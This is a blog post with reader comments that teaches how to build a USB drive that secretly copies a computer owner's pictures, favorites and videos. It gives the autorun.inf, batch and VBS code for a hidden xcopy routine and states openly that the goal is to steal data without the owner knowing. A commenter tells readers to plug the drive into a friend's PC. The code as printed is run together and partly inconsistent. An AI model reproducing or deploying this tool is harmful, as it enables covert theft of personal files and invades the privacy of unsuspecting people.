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How to Secretly Copy Files From Someones PC Without His Knowledge

Hemant Verma - 7:58 PM

You can easily copy data from your friend's computer to with out knowing him/her. This trick can help you to do this kind of task, and you don't need any kind of internet support for this task and also don't need any kind of new technology like Bluetooth, Infrared etc. You can do this task by just a little notepad trick also need some codes for this job, and I will totally work very smoothly.

This Trick could prove to be very helpful and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

Let's Know that How to do this?

  • Open Notepad
  • Copy below code 

[autorun]icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat

  • Paste it in Notepad.
  • Save this file as autorun.inf
  • Open Notepad again.
  • Copy Below code again

@echo off:: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics" %backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites" %backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids" @echo off cls

  • Paste it in Notepad.
  • Save this file as File.bat
  • Open Notepad again.
  • Copy Below code also

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

  • Paste it in Notepad.
  • Save this file as Invisible.vbs
  • Now again open Notepad.
  • Copy below code once again

wscript.exe \invisible.vbs file.bat

  • Paste it in Notepad
  • Save this as Launch.bat
  • Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.
  • Create a folder named “Data” where the Stolen contents would be Copied automatically.
  • Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.



  1. i followed all the steps but i don't find any stolen data or file

  2. @chis alido it with more consentration and use a usb drive and save that notepad file in it and put that usb drive in your frnds pc and then run that notepad created file.

  3. Most of these days, autorun.inf has been detected by most Antiviruses out there.
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